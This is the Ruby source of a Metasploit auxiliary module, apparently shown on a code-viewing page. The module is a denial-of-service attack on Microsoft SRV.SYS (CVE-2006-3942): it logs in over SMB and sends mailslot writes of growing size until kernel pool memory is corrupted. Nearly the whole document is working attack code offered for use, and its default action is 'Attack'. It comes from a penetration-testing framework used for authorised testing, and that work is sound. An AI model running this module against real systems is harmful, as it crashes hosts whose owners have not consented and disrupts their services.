Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::SMB::Client
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Microsoft SRV.SYS Mailslot Write Corruption',
13
      'Description'    => %q{
14
        This module triggers a kernel pool corruption bug in SRV.SYS. Each
15
      call to the mailslot write function results in a two byte return value
16
      being written into the response packet. The code which creates this packet
17
      fails to consider these two bytes in the allocation routine, resulting in
18
      a slow corruption of the kernel memory pool. These two bytes are almost
19
      always set to "\xff\xff" (a short integer with value of -1).
20
      },
21

22
      'Author'         => [ 'hdm' ],
23
      'License'        => MSF_LICENSE,
24
      'References'     =>
25
        [
26
          ['BID', '19215'],
27
          ['OSVDB', '27644'],
28
          ['CVE', '2006-3942'],
29
          ['URL', 'http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10'],
30
          ['MSB', 'MS06-035'],
31
        ],
32
      'Actions'     =>
33
        [
34
          ['Attack', 'Description' => 'Run Denial of Service'],
35
        ],
36
      'DefaultAction' => 'Attack',
37
      'DisclosureDate' => '2006-07-11'
38
    ))
39

40
    register_options(
41
      [
42
        OptString.new('MAILSLOT', [ true,  "The mailslot name to use", 'Alerter']),
43
      ])
44

45
    deregister_options('SMB::ProtocolVersion')
46
  end
47

48
  # MAILSLOT: HydraLsServer
49
  # MAILSLOT: Messngr
50
  # MAILSLOT: 53cb31a0\\UnimodemNotifyTSP
51

52
  def run
53

54
    case action.name
55
    when 'Attack'
56

57
      print_status("Mangling the kernel, two bytes at a time...");
58

59
      connect(versions: [1])
60
      smb_login
61

62
      1.upto(1024) do |i|
63

64
        if (i % 100 == 0)
65
          print_status("Sending request containing #{i} bytes...")
66
        end
67

68
        begin
69
          self.simple.client.trans_mailslot("\\MAILSLOT\\"+datastore['MAILSLOT'], "X" * i)
70

71
        rescue ::Interrupt
72
          return
73

74
        rescue ::Exception => e
75

76
          if (i == 1)
77
            print_error("Failed to write any data to the mailslot: #{e}")
78
            break
79
          end
80
          print_error("Exception occurred on iteration #{i}")
81
          print_error("Error: #{e.class} > #{e}")
82
          break
83
        end
84
      end
85

86
    # Errors:
87
    #  0xc0000034 = object not found
88
    #  0xc0000205 = insufficient resources (too much data)
89

90
    end
91

92
    disconnect
93
  end
94
end
95

96